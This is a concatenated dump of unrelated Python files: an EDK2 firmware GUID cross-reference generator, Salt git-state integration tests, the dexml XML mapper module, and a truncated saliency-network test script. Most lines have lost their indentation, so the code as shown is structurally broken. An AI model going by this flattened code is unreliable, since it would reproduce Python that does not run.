PcdValue = PcdObj.DefaultValue
break
if PcdValue == '':
return
Int64PcdValue = long(PcdValue, 0)
if Int64PcdValue == 0 or Int64PcdValue < -1:
return
TopAddress = 0
if Int64PcdValue > 0:
TopAddress = Int64PcdValue
ModuleDict = BuildDb.BuildObject[DscFile, TAB_COMMON, GenFdsGlobalVariable.TargetName, GenFdsGlobalVariable.ToolChainTag].Modules
for Key in ModuleDict:
ModuleObj = BuildDb.BuildObject[Key, TAB_COMMON, GenFdsGlobalVariable.TargetName, GenFdsGlobalVariable.ToolChainTag]
print(ModuleObj.BaseName + ' ' + ModuleObj.ModuleType)
@staticmethod
def GenerateGuidXRefFile(BuildDb, ArchList, FdfParserObj):
GuidXRefFileName = os.path.join(GenFdsGlobalVariable.FvDir, "Guid.xref")
GuidXRefFile = BytesIO('')
PkgGuidDict = {}
GuidDict = {}
ModuleList = []
FileGuidList = []
for Arch in ArchList:
PlatformDataBase = BuildDb.BuildObject[GenFdsGlobalVariable.ActivePlatform, Arch, GenFdsGlobalVariable.TargetName, GenFdsGlobalVariable.ToolChainTag]
PkgList = GenFdsGlobalVariable.WorkSpace.GetPackageList(GenFdsGlobalVariable.ActivePlatform, Arch, GenFdsGlobalVariable.TargetName, GenFdsGlobalVariable.ToolChainTag)
for P in PkgList:
PkgGuidDict.update(P.Guids)
for Name, Guid in PlatformDataBase.Pcds:
Pcd = PlatformDataBase.Pcds[Name, Guid]
if Pcd.Type in [TAB_PCDS_DYNAMIC_HII, TAB_PCDS_DYNAMIC_EX_HII]:
for SkuId in Pcd.SkuInfoList:
Sku = Pcd.SkuInfoList[SkuId]
if Sku.VariableGuid and Sku.VariableGuid in PkgGuidDict.keys():
GuidDict[Sku.VariableGuid] = PkgGuidDict[Sku.VariableGuid]
for ModuleFile in PlatformDataBase.Modules:
Module = BuildDb.BuildObject[ModuleFile, Arch, GenFdsGlobalVariable.TargetName, GenFdsGlobalVariable.ToolChainTag]
if Module in ModuleList:
continue
else:
ModuleList.append(Module)
if GlobalData.gGuidPattern.match(ModuleFile.BaseName):
GuidXRefFile.write("%s %s\n" % (ModuleFile.BaseName, Module.BaseName))
else:
GuidXRefFile.write("%s %s\n" % (Module.Guid, Module.BaseName))
GuidDict.update(Module.Protocols)
GuidDict.update(Module.Guids)
GuidDict.update(Module.Ppis)
for FvName in FdfParserObj.Profile.FvDict:
for FfsObj in FdfParserObj.Profile.FvDict[FvName].FfsList:
if not isinstance(FfsObj, FileStatement):
InfPath = PathClass(NormPath(mws.join(GenFdsGlobalVariable.WorkSpaceDir, FfsObj.InfFileName)))
FdfModule = BuildDb.BuildObject[InfPath, Arch, GenFdsGlobalVariable.TargetName, GenFdsGlobalVariable.ToolChainTag]
if FdfModule in ModuleList:
continue
else:
ModuleList.append(FdfModule)
GuidXRefFile.write("%s %s\n" % (FdfModule.Guid, FdfModule.BaseName))
GuidDict.update(FdfModule.Protocols)
GuidDict.update(FdfModule.Guids)
GuidDict.update(FdfModule.Ppis)
else:
FileStatementGuid = FfsObj.NameGuid
if FileStatementGuid in FileGuidList:
continue
else:
FileGuidList.append(FileStatementGuid)
Name = []
FfsPath = os.path.join(GenFdsGlobalVariable.FvDir, 'Ffs')
FfsPath = glob(os.path.join(FfsPath, FileStatementGuid) + TAB_STAR)
if not FfsPath:
continue
if not os.path.exists(FfsPath[0]):
continue
MatchDict = {}
                        ReFileEnds = compile(r'\S+(.ui)$|\S+(fv.sec.txt)$|\S+(.pe32.txt)$|\S+(.te.txt)$|\S+(.pic.txt)$|\S+(.raw.txt)$|\S+(.ffs.txt)$')
FileList = os.listdir(FfsPath[0])
for File in FileList:
Match = ReFileEnds.search(File)
if Match:
for Index in range(1, 8):
if Match.group(Index) and Match.group(Index) in MatchDict:
MatchDict[Match.group(Index)].append(File)
elif Match.group(Index):
MatchDict[Match.group(Index)] = [File]
if not MatchDict:
continue
if '.ui' in MatchDict:
for File in MatchDict['.ui']:
with open(os.path.join(FfsPath[0], File), 'rb') as F:
F.read()
length = F.tell()
F.seek(4)
                                    TmpStr = unpack('%dh' % ((length - 4) // 2), F.read())
Name = ''.join(chr(c) for c in TmpStr[:-1])
else:
FileList = []
if 'fv.sec.txt' in MatchDict:
FileList = MatchDict['fv.sec.txt']
elif '.pe32.txt' in MatchDict:
FileList = MatchDict['.pe32.txt']
elif '.te.txt' in MatchDict:
FileList = MatchDict['.te.txt']
elif '.pic.txt' in MatchDict:
FileList = MatchDict['.pic.txt']
elif '.raw.txt' in MatchDict:
FileList = MatchDict['.raw.txt']
elif '.ffs.txt' in MatchDict:
FileList = MatchDict['.ffs.txt']
else:
pass
for File in FileList:
with open(os.path.join(FfsPath[0], File), 'r') as F:
Name.append((F.read().split()[-1]))
if not Name:
continue
Name = ' '.join(Name) if isinstance(Name, type([])) else Name
GuidXRefFile.write("%s %s\n" %(FileStatementGuid, Name))
# Append GUIDs, Protocols, and PPIs to the Xref file
GuidXRefFile.write("\n")
for key, item in GuidDict.items():
GuidXRefFile.write("%s %s\n" % (GuidStructureStringToGuidString(item).upper(), key))
if GuidXRefFile.getvalue():
SaveFileOnChange(GuidXRefFileName, GuidXRefFile.getvalue(), False)
GenFdsGlobalVariable.InfLogger("\nGUID cross reference file can be found at %s" % GuidXRefFileName)
elif os.path.exists(GuidXRefFileName):
os.remove(GuidXRefFileName)
GuidXRefFile.close()
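## _LoadGuidXRefFile() -- illustrative sketch, not part of the original tool
#
#   GenerateGuidXRefFile above writes one "GUID Name" pair per line, plus a
#   trailing block mapping GUID values to their C names; this shows how such a
#   Guid.xref file can be read back into a dictionary, e.g. to resolve GUIDs
#   seen in a firmware image. The path argument is wherever Guid.xref was
#   written (GenFdsGlobalVariable.FvDir/Guid.xref in the code above).
#
def _LoadGuidXRefFile(XRefFileName):
    GuidToName = {}
    with open(XRefFileName) as XRefFile:
        for Line in XRefFile:
            Parts = Line.split()
            if len(Parts) >= 2:
                GuidToName[Parts[0].upper()] = ' '.join(Parts[1:])
    return GuidToName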
if __name__ == '__main__':
r = main()
## 0-127 is a safe return range, and 1 is a standard default error
if r < 0 or r > 127:
r = 1
exit(r)
|
|
# -*- coding: utf-8 -*-
'''
Tests for the Git state
'''
# Import python libs
from __future__ import absolute_import
import os
import shutil
import socket
import subprocess
import tempfile
# Import Salt Testing libs
from salttesting.helpers import ensure_in_syspath, skip_if_binaries_missing
ensure_in_syspath('../../')
# Import salt libs
import integration
import salt.utils
class GitTest(integration.ModuleCase, integration.SaltReturnAssertsMixIn):
'''
Validate the git state
'''
def setUp(self):
super(GitTest, self).setUp()
self.__domain = 'github.com'
try:
if hasattr(socket, 'setdefaulttimeout'):
# 10 second dns timeout
socket.setdefaulttimeout(10)
socket.gethostbyname(self.__domain)
except socket.error:
msg = 'error resolving {0}, possible network issue?'
self.skipTest(msg.format(self.__domain))
def test_latest(self):
'''
git.latest
'''
name = os.path.join(integration.TMP, 'salt_repo')
try:
ret = self.run_state(
'git.latest',
name='https://{0}/saltstack/salt-test-repo.git'.format(self.__domain),
target=name
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(name, '.git')))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_latest_with_rev_and_submodules(self):
'''
git.latest
'''
name = os.path.join(integration.TMP, 'salt_repo')
try:
ret = self.run_state(
'git.latest',
name='https://{0}/saltstack/salt-test-repo.git'.format(self.__domain),
rev='develop',
target=name,
submodules=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(name, '.git')))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_latest_failure(self):
'''
git.latest
'''
name = os.path.join(integration.TMP, 'salt_repo')
try:
ret = self.run_state(
'git.latest',
name='https://youSpelledGitHubWrong.com/saltstack/salt-test-repo.git',
rev='develop',
target=name,
submodules=True
)
self.assertSaltFalseReturn(ret)
self.assertFalse(os.path.isdir(os.path.join(name, '.git')))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_latest_empty_dir(self):
'''
git.latest
'''
name = os.path.join(integration.TMP, 'salt_repo')
if not os.path.isdir(name):
os.mkdir(name)
try:
ret = self.run_state(
'git.latest',
name='https://{0}/saltstack/salt-test-repo.git'.format(self.__domain),
rev='develop',
target=name,
submodules=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(name, '.git')))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_latest_unless_no_cwd_issue_6800(self):
'''
cwd=target was being passed to _run_check which blew up if
target dir did not already exist.
'''
name = os.path.join(integration.TMP, 'salt_repo')
if os.path.isdir(name):
shutil.rmtree(name)
try:
ret = self.run_state(
'git.latest',
name='https://{0}/saltstack/salt-test-repo.git'.format(self.__domain),
rev='develop',
target=name,
unless='test -e {0}'.format(name),
submodules=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(name, '.git')))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_numeric_rev(self):
'''
git.latest with numeric revision
'''
name = os.path.join(integration.TMP, 'salt_repo')
try:
ret = self.run_state(
'git.latest',
name='https://{0}/saltstack/salt-test-repo.git'.format(self.__domain),
rev=0.11,
target=name,
submodules=True,
timeout=120
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(name, '.git')))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_latest_with_local_changes(self):
'''
Ensure that we fail the state when there are local changes and succeed
when force_reset is True.
'''
name = os.path.join(integration.TMP, 'salt_repo')
try:
# Clone repo
ret = self.run_state(
'git.latest',
name='https://{0}/saltstack/salt-test-repo.git'.format(self.__domain),
target=name
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(name, '.git')))
# Make change to LICENSE file.
with salt.utils.fopen(os.path.join(name, 'LICENSE'), 'a') as fp_:
fp_.write('Lorem ipsum dolor blah blah blah....\n')
# Make sure that we now have uncommitted changes
self.assertTrue(self.run_function('git.diff', [name, 'HEAD']))
# Re-run state with force_reset=False, this should fail
ret = self.run_state(
'git.latest',
name='https://{0}/saltstack/salt-test-repo.git'.format(self.__domain),
target=name,
force_reset=False
)
self.assertSaltFalseReturn(ret)
# Now run the state with force_reset=True, this should succeed
ret = self.run_state(
'git.latest',
name='https://{0}/saltstack/salt-test-repo.git'.format(self.__domain),
target=name,
force_reset=True
)
self.assertSaltTrueReturn(ret)
# Make sure that we no longer have uncommitted changes
self.assertFalse(self.run_function('git.diff', [name, 'HEAD']))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_present(self):
'''
git.present
'''
name = os.path.join(integration.TMP, 'salt_repo')
try:
ret = self.run_state(
'git.present',
name=name,
bare=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(os.path.join(name, 'HEAD')))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_present_failure(self):
'''
git.present
'''
name = os.path.join(integration.TMP, 'salt_repo')
if not os.path.isdir(name):
os.mkdir(name)
try:
fname = os.path.join(name, 'stoptheprocess')
with salt.utils.fopen(fname, 'a') as fh_:
fh_.write('')
ret = self.run_state(
'git.present',
name=name,
bare=True
)
self.assertSaltFalseReturn(ret)
self.assertFalse(os.path.isfile(os.path.join(name, 'HEAD')))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_present_empty_dir(self):
'''
git.present
'''
name = os.path.join(integration.TMP, 'salt_repo')
if not os.path.isdir(name):
os.mkdir(name)
try:
ret = self.run_state(
'git.present',
name=name,
bare=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(os.path.join(name, 'HEAD')))
finally:
shutil.rmtree(name, ignore_errors=True)
@skip_if_binaries_missing('git')
def test_config_set_value_with_space_character(self):
'''
git.config
'''
name = tempfile.mkdtemp(dir=integration.TMP)
self.addCleanup(shutil.rmtree, name, ignore_errors=True)
subprocess.check_call(['git', 'init', '--quiet', name])
ret = self.run_state(
'git.config_set',
name='user.name',
value='foo bar',
repo=name,
**{'global': False})
self.assertSaltTrueReturn(ret)
if __name__ == '__main__':
from integration import run_tests
run_tests(GitTest)
|
|
"""
dexml: a dead-simple Object-XML mapper for Python
==================================================
Let's face it: xml is a fact of modern life. I'd even go so far as to say
that it's *good* at what it does. But that doesn't mean it's easy to work
with and it doesn't mean that we have to like it. Most of the time, XML
just needs to get out of the way and let you do some actual work instead
of writing code to traverse and manipulate yet another DOM.
The dexml module takes the obvious mapping between XML tags and Python objects
and lets you capture that as cleanly as possible. Loosely inspired by Django's
ORM, you write simple class definitions to define the expected structure of
your XML document. Like so::
>>> import dexml
>>> from dexml import fields
>>> class Person(dexml.Model):
... name = fields.String()
... age = fields.Integer(tagname='age')
Then you can parse an XML document into an object like this::
>>> p = Person.parse("<Person name='Foo McBar'><age>42</age></Person>")
>>> p.name
u'Foo McBar'
>>> p.age
42
And you can render an object into an XML document like this::
>>> p = Person(name="Handsome B. Wonderful",age=36)
>>> p.render()
'<?xml version="1.0" ?><Person name="Handsome B. Wonderful"><age>36</age></Person>'
Malformed documents will raise a ParseError::
>>> p = Person.parse("<Person><age>92</age></Person>")
Traceback (most recent call last):
...
ParseError: required field not found: 'name'
Of course, it gets more interesting when you nest Model definitions, like this::
>>> class Group(dexml.Model):
... name = fields.String(attrname="name")
... members = fields.List(Person)
...
>>> g = Group(name="Monty Python")
>>> g.members.append(Person(name="John Cleese",age=69))
>>> g.members.append(Person(name="Terry Jones",age=67))
>>> g.render(fragment=True)
'<Group name="Monty Python"><Person name="John Cleese"><age>69</age></Person><Person name="Terry Jones"><age>67</age></Person></Group>'
There's support for XML namespaces, default field values, case-insensitive
parsing, and more fun stuff. Check out the documentation on the following
classes for more details:
:Model: the base class for objects that map into XML
:Field: the base class for individual model fields
:Meta: meta-information about how to parse/render a model
"""
__ver_major__ = 0
__ver_minor__ = 5
__ver_patch__ = 1
__ver_sub__ = ""
__version__ = "%d.%d.%d%s" % (__ver_major__,__ver_minor__,__ver_patch__,__ver_sub__)
import sys
import re
import copy
from xml.dom import minidom
from dexml import fields
if sys.version_info >= (3,):
str = str #pragma: no cover
unicode = str #pragma: no cover
bytes = bytes #pragma: no cover
basestring = (str,bytes) #pragma: no cover
else:
str = str #pragma: no cover
unicode = unicode #pragma: no cover
bytes = str #pragma: no cover
basestring = basestring #pragma: no cover
class Error(Exception):
"""Base exception class for the dexml module."""
pass
class ParseError(Error):
"""Exception raised when XML could not be parsed into objects."""
pass
class RenderError(Error):
"""Exception raised when object could not be rendered into XML."""
pass
class XmlError(Error):
"""Exception raised to encapsulate errors from underlying XML parser."""
pass
class PARSE_DONE:
"""Constant returned by a Field when it has finished parsing."""
pass
class PARSE_MORE:
"""Constant returned by a Field when it wants additional nodes to parse."""
pass
class PARSE_SKIP:
"""Constant returned by a Field when it cannot parse the given node."""
pass
class PARSE_CHILDREN:
"""Constant returned by a Field to parse children from its container tag."""
pass
class Meta:
"""Class holding meta-information about a dexml.Model subclass.
Each dexml.Model subclass has an attribute 'meta' which is an instance
of this class. That instance holds information about how the model
corresponds to XML, such as its tagname, namespace, and error handling
semantics. You would not ordinarily create an instance of this class;
instead let the ModelMetaclass create one automatically.
These attributes control how the model corresponds to the XML:
* tagname: the name of the tag representing this model
* namespace: the XML namespace in which this model lives
These attributes control parsing/rendering behaviour:
* namespace_prefix: the prefix to use for rendering namespaced tags
* ignore_unknown_elements: ignore unknown elements when parsing
* case_sensitive: match tag/attr names case-sensitively
* order_sensitive: match child tags in order of field definition
"""
_defaults = {"tagname":None,
"namespace":None,
"namespace_prefix":None,
"ignore_unknown_elements":True,
"case_sensitive":True,
"order_sensitive":True}
def __init__(self,name,meta_attrs):
for (attr,default) in self._defaults.items():
setattr(self,attr,meta_attrs.get(attr,default))
if self.tagname is None:
self.tagname = name
def _meta_attributes(meta):
"""Extract attributes from a "meta" object."""
meta_attrs = {}
if meta:
for attr in dir(meta):
if not attr.startswith("_"):
meta_attrs[attr] = getattr(meta,attr)
return meta_attrs
class ModelMetaclass(type):
"""Metaclass for dexml.Model and subclasses.
This metaclass is responsible for introspecting Model class definitions
and setting up appropriate default behaviours. For example, this metaclass
sets a Model's default tagname to be equal to the declared class name.
"""
instances_by_tagname = {}
instances_by_classname = {}
def __new__(mcls,name,bases,attrs):
cls = super(ModelMetaclass,mcls).__new__(mcls,name,bases,attrs)
# Don't do anything if it's not a subclass of Model
parents = [b for b in bases if isinstance(b, ModelMetaclass)]
if not parents:
return cls
# Set up the cls.meta object, inheriting from base classes
meta_attrs = {}
for base in reversed(bases):
if isinstance(base,ModelMetaclass) and hasattr(base,"meta"):
meta_attrs.update(_meta_attributes(base.meta))
meta_attrs.pop("tagname",None)
meta_attrs.update(_meta_attributes(attrs.get("meta",None)))
cls.meta = Meta(name,meta_attrs)
# Create ordered list of field objects, telling each about their
# name and containing class. Inherit fields from base classes
# only if not overridden on the class itself.
base_fields = {}
for base in bases:
if not isinstance(base,ModelMetaclass):
continue
for field in base._fields:
if field.field_name not in base_fields:
field = copy.copy(field)
field.model_class = cls
base_fields[field.field_name] = field
cls_fields = []
        for (name,value) in attrs.items():
if isinstance(value,fields.Field):
base_fields.pop(name,None)
value.field_name = name
value.model_class = cls
cls_fields.append(value)
        cls._fields = list(base_fields.values()) + cls_fields
cls._fields.sort(key=lambda f: f._order_counter)
# Register the new class so we can find it by name later on
tagname = (cls.meta.namespace,cls.meta.tagname)
mcls.instances_by_tagname[tagname] = cls
mcls.instances_by_classname[cls.__name__] = cls
return cls
@classmethod
def find_class(mcls,tagname,namespace=None):
"""Find dexml.Model subclass for the given tagname and namespace."""
try:
return mcls.instances_by_tagname[(namespace,tagname)]
except KeyError:
if namespace is None:
try:
return mcls.instances_by_classname[tagname]
except KeyError:
pass
return None
# You can use this re to extract the encoding declaration from the XML
# document string. Hopefully you won't have to, but you might need to...
_XML_ENCODING_RE = re.compile("<\\?xml [^>]*encoding=[\"']([a-zA-Z0-9\\.\\-\\_]+)[\"'][^>]*?>")
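# Illustrative sketch (not part of dexml's public API): pulling the declared
# encoding out of a document header with the regular expression above, falling
# back to None when there is no declaration (the same pattern is applied in
# Model._make_xml_node below, with a utf8 fallback).
def _declared_encoding(xml_string):
    match = _XML_ENCODING_RE.match(xml_string)
    return match.group(1) if match else None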
class Model(object):
"""Base class for dexml Model objects.
Subclasses of Model represent a concrete type of object that can parsed
from or rendered to an XML document. The mapping to/from XML is controlled
by two things:
* attributes declared on an inner class named 'meta'
* fields declared using instances of fields.Field
Here's a quick example:
class Person(dexml.Model):
# This overrides the default tagname of 'Person'
            class meta:
tagname = "person"
            # This maps to a 'name' attribute on the <person> tag
name = fields.String()
# This maps to an <age> tag within the <person> tag
age = fields.Integer(tagname='age')
See the 'Meta' class in this module for available meta options, and the
'fields' submodule for available field types.
"""
__metaclass__ = ModelMetaclass
_fields = []
def __init__(self,**kwds):
"""Default Model constructor.
Keyword arguments that correspond to declared fields are processed
and assigned to that field.
"""
for f in self._fields:
try:
setattr(self,f.field_name,kwds[f.field_name])
except KeyError:
pass
@classmethod
def parse(cls,xml):
"""Produce an instance of this model from some xml.
The given xml can be a string, a readable file-like object, or
a DOM node; we might add support for more types in the future.
"""
self = cls()
node = self._make_xml_node(xml)
self.validate_xml_node(node)
# Keep track of fields that have successfully parsed something
fields_found = []
# Try to consume all the node's attributes
attrs = node.attributes.values()
for field in self._fields:
unused_attrs = field.parse_attributes(self,attrs)
if len(unused_attrs) < len(attrs):
fields_found.append(field)
attrs = unused_attrs
for attr in attrs:
self._handle_unparsed_node(attr)
# Try to consume all child nodes
if self.meta.order_sensitive:
self._parse_children_ordered(node,self._fields,fields_found)
else:
self._parse_children_unordered(node,self._fields,fields_found)
# Check that all required fields have been found
for field in self._fields:
if field.required and field not in fields_found:
err = "required field not found: '%s'" % (field.field_name,)
raise ParseError(err)
field.parse_done(self)
# All done, return the instance so created
return self
def _parse_children_ordered(self,node,fields,fields_found):
"""Parse the children of the given node using strict field ordering."""
cur_field_idx = 0
for child in node.childNodes:
idx = cur_field_idx
# If we successfully break out of this loop, one of our
# fields has consumed the node.
while idx < len(fields):
field = fields[idx]
res = field.parse_child_node(self,child)
if res is PARSE_DONE:
if field not in fields_found:
fields_found.append(field)
cur_field_idx = idx + 1
break
if res is PARSE_MORE:
if field not in fields_found:
fields_found.append(field)
cur_field_idx = idx
break
if res is PARSE_CHILDREN:
if field not in fields_found:
fields_found.append(field)
self._parse_children_ordered(child,[field],fields_found)
cur_field_idx = idx
break
idx += 1
else:
self._handle_unparsed_node(child)
def _parse_children_unordered(self,node,fields,fields_found):
"""Parse the children of the given node using loose field ordering."""
done_fields = {}
for child in node.childNodes:
idx = 0
# If we successfully break out of this loop, one of our
# fields has consumed the node.
while idx < len(fields):
if idx in done_fields:
idx += 1
continue
field = fields[idx]
res = field.parse_child_node(self,child)
if res is PARSE_DONE:
done_fields[idx] = True
if field not in fields_found:
fields_found.append(field)
break
if res is PARSE_MORE:
if field not in fields_found:
fields_found.append(field)
break
if res is PARSE_CHILDREN:
if field not in fields_found:
fields_found.append(field)
self._parse_children_unordered(child,[field],fields_found)
break
idx += 1
else:
self._handle_unparsed_node(child)
def _handle_unparsed_node(self,node):
if not self.meta.ignore_unknown_elements:
if node.nodeType == node.ELEMENT_NODE:
err = "unknown element: %s" % (node.nodeName,)
raise ParseError(err)
elif node.nodeType in (node.TEXT_NODE,node.CDATA_SECTION_NODE):
if node.nodeValue.strip():
err = "unparsed text node: %s" % (node.nodeValue,)
raise ParseError(err)
elif node.nodeType == node.ATTRIBUTE_NODE:
if not node.nodeName.startswith("xml"):
err = "unknown attribute: %s" % (node.name,)
raise ParseError(err)
def render(self,encoding=None,fragment=False,pretty=False,nsmap=None):
"""Produce XML from this model's instance data.
A unicode string will be returned if any of the objects contain
unicode values; specifying the 'encoding' argument forces generation
of a bytestring.
By default a complete XML document is produced, including the
leading "<?xml>" declaration. To generate an XML fragment set
the 'fragment' argument to True.
"""
if nsmap is None:
nsmap = {}
data = []
header = '<?xml version="1.0" ?>'
if encoding:
header = '<?xml version="1.0" encoding="%s" ?>' % (encoding,)
if not fragment:
data.append(header)
data.extend(self._render(nsmap))
xml = "".join(data)
if pretty:
xml = minidom.parseString(xml).toprettyxml()
# Hack for removing the `<?xml version="1.0"?>` header that
# minidom adds when pretty printing.
line_break_position = xml.find('\n') + 1
headless_xml = xml[line_break_position:]
if fragment:
xml = headless_xml
elif encoding:
# Minidom also removes the header (or just the `encoding` key)
# if it is present
xml = header + '\n' + headless_xml
if encoding:
xml = xml.encode(encoding)
return xml
def irender(self,encoding=None,fragment=False,nsmap=None):
"""Generator producing XML from this model's instance data.
If any of the objects contain unicode values, the resulting output
stream will be a mix of bytestrings and unicode; specify the 'encoding'
        argument to force generation of bytestrings.
By default a complete XML document is produced, including the
leading "<?xml>" declaration. To generate an XML fragment set
the 'fragment' argument to True.
"""
if nsmap is None:
nsmap = {}
if not fragment:
if encoding:
decl = '<?xml version="1.0" encoding="%s" ?>' % (encoding,)
yield decl.encode(encoding)
else:
yield '<?xml version="1.0" ?>'
if encoding:
for data in self._render(nsmap):
if isinstance(data,unicode):
data = data.encode(encoding)
yield data
else:
for data in self._render(nsmap):
yield data
def _render(self,nsmap):
"""Generator rendering this model as an XML fragment."""
# Determine opening and closing tags
pushed_ns = False
if self.meta.namespace:
namespace = self.meta.namespace
prefix = self.meta.namespace_prefix
try:
cur_ns = nsmap[prefix]
except KeyError:
cur_ns = []
nsmap[prefix] = cur_ns
if prefix:
tagname = "%s:%s" % (prefix,self.meta.tagname)
open_tag_contents = [tagname]
if not cur_ns or cur_ns[0] != namespace:
cur_ns.insert(0,namespace)
pushed_ns = True
open_tag_contents.append('xmlns:%s="%s"'%(prefix,namespace))
close_tag_contents = tagname
else:
open_tag_contents = [self.meta.tagname]
if not cur_ns or cur_ns[0] != namespace:
cur_ns.insert(0,namespace)
pushed_ns = True
open_tag_contents.append('xmlns="%s"'%(namespace,))
close_tag_contents = self.meta.tagname
else:
open_tag_contents = [self.meta.tagname]
close_tag_contents = self.meta.tagname
used_fields = set()
open_tag_contents.extend(self._render_attributes(used_fields,nsmap))
# Render each child node
children = self._render_children(used_fields,nsmap)
try:
            first_child = next(children)
except StopIteration:
yield "<%s />" % (" ".join(open_tag_contents),)
else:
yield "<%s>" % (" ".join(open_tag_contents),)
yield first_child
for child in children:
yield child
yield "</%s>" % (close_tag_contents,)
# Check that all required fields actually rendered something
for f in self._fields:
if f.required and f not in used_fields:
raise RenderError("Field '%s' is missing" % (f.field_name,))
# Clean up
if pushed_ns:
nsmap[prefix].pop(0)
def _render_attributes(self,used_fields,nsmap):
for f in self._fields:
val = getattr(self,f.field_name)
datas = iter(f.render_attributes(self,val,nsmap))
try:
                data = next(datas)
except StopIteration:
pass
else:
used_fields.add(f)
yield data
for data in datas:
yield data
def _render_children(self,used_fields,nsmap):
for f in self._fields:
val = getattr(self,f.field_name)
datas = iter(f.render_children(self,val,nsmap))
try:
                data = next(datas)
except StopIteration:
pass
else:
used_fields.add(f)
yield data
for data in datas:
yield data
@staticmethod
def _make_xml_node(xml):
"""Transform a variety of input formats to an XML DOM node."""
try:
ntype = xml.nodeType
except AttributeError:
if isinstance(xml,bytes):
try:
xml = minidom.parseString(xml)
                except Exception as e:
raise XmlError(e)
elif isinstance(xml,unicode):
try:
# Try to grab the "encoding" attribute from the XML.
# It probably won't exist, so default to utf8.
encoding = _XML_ENCODING_RE.match(xml)
if encoding is None:
encoding = "utf8"
else:
encoding = encoding.group(1)
xml = minidom.parseString(xml.encode(encoding))
                except Exception as e:
raise XmlError(e)
elif hasattr(xml,"read"):
try:
xml = minidom.parse(xml)
                except Exception as e:
raise XmlError(e)
else:
raise ValueError("Can't convert that to an XML DOM node")
node = xml.documentElement
else:
if ntype == xml.DOCUMENT_NODE:
node = xml.documentElement
else:
node = xml
return node
@classmethod
def validate_xml_node(cls,node):
"""Check that the given xml node is valid for this object.
Here 'valid' means that it is the right tag, in the right
namespace. We might add more eventually...
"""
if node.nodeType != node.ELEMENT_NODE:
err = "Class '%s' got a non-element node"
err = err % (cls.__name__,)
raise ParseError(err)
if cls.meta.case_sensitive:
if node.localName != cls.meta.tagname:
err = "Class '%s' got tag '%s' (expected '%s')"
err = err % (cls.__name__,node.localName,
cls.meta.tagname)
raise ParseError(err)
else:
if node.localName.lower() != cls.meta.tagname.lower():
err = "Class '%s' got tag '%s' (expected '%s')"
err = err % (cls.__name__,node.localName,
cls.meta.tagname)
raise ParseError(err)
if cls.meta.namespace:
if node.namespaceURI != cls.meta.namespace:
err = "Class '%s' got namespace '%s' (expected '%s')"
err = err % (cls.__name__,node.namespaceURI,
cls.meta.namespace)
raise ParseError(err)
else:
if node.namespaceURI:
err = "Class '%s' got namespace '%s' (expected no namespace)"
err = err % (cls.__name__,node.namespaceURI,)
raise ParseError(err)
|
|
#!/usr/bin/env python
__author__ = 'joon'
import sys
sys.path.insert(0, 'src')
sys.path.insert(0, 'lib')
sys.path.insert(0, 'ResearchTools')
from imports.basic_modules import *
from imports.import_caffe import *
from imports.ResearchTools import *
from imports.libmodules import *
from config import config_test
####
EXP_PHASE = 'saliency-test'
conf = dict(
vis=True,
save_heat=True,
overridecache=True,
shuffle=False,
pascalroot="/BS/joon_projects/work",
gpu=1,
n=0,
N=1,
)
control = dict(
net='DeepLabv2_ResNet',
dataset='MSRA',
datatype='NP',
test_dataset='voc12val',
test_datatype='Segmentation',
)
####
def parse_input(argv=sys.argv):
parser = argparse.ArgumentParser(description="Tests saliency network")
parser.add_argument('--net', default='DeepLabv2_ResNet', type=str,
help='Network')
parser.add_argument('--dataset', default='MSRA', type=str,
help='Training set')
parser.add_argument('--datatype', default='NP', type=str,
help='Type of training set')
parser.add_argument('--test_dataset', default='voc12val', type=str,
help='Test dataset')
parser.add_argument('--test_datatype', default='Segmentation', type=str,
help='Type of test data')
control = vars(parser.parse_known_args(argv)[0])
parser_conf = argparse.ArgumentParser()
parser_conf.add_argument('--pascalroot', default='/home', type=str,
help='Pascal VOC root folder')
parser_conf.add_argument('--gpu', default=1, type=int,
help='GPU ID')
parser_conf.add_argument('--vis', default=False, type=bool,
help='Visualisation')
parser_conf.add_argument('--save_heat', default=True, type=bool,
help='Save raw heatmap output')
parser_conf.add_argument('--overridecache', default=True, type=bool,
help='Override cache')
parser_conf.add_argument('--shuffle', default=True, type=bool,
help='Shuffle test input order')
parser_conf.add_argument('--N', default=1, type=int,
help='Fragment test set into N fragments')
parser_conf.add_argument('--n', default=0, type=int,
help='test n th fragment')
conf = vars(parser_conf.parse_known_args(argv)[0])
return control, conf
def process_test_input(im, transformer, input_padded_size):
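    # Shrink the image if it exceeds the padded input size, then reflect-pad it
    # to a square input_padded_size canvas; the returned margins and scale
    # factor let the caller map predictions back to the original resolution.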
H, W = im.shape[:2]
if (H <= input_padded_size and W <= input_padded_size):
        factor = 1
else:
factor = min(float(input_padded_size) / H, float(input_padded_size) / W)
im = scipy.misc.imresize(im, factor, interp="bilinear")
H, W = im.shape[:2]
margin = [input_padded_size - H, input_padded_size - W]
margins = [
margin[0] // 2,
margin[0] - margin[0] // 2,
margin[1] // 2,
margin[1] - margin[1] // 2,
]
input_image = cv2.copyMakeBorder(im, margins[0], margins[1], margins[2], margins[3], cv2.BORDER_REFLECT_101)
input_image = transformer.preprocess('data', input_image)
return input_image, margins, factor, H, W
def net_forward(net, input_image):
net.blobs['data'].data[:] = input_image.astype(np.float32)
output = net.forward()
prob = output['fc1_prob'][0]
return prob
def process_test_output_prob(prob, margins, H_original, W_original, H, W, input_padded_size, factor):
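    # Undo the test-time padding and resizing: upsample each output channel to
    # the padded input resolution, crop away the padding margins, then resize
    # back to the original image size.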
prob_trimmed = np.zeros([2, H_original, W_original], dtype=np.float32)
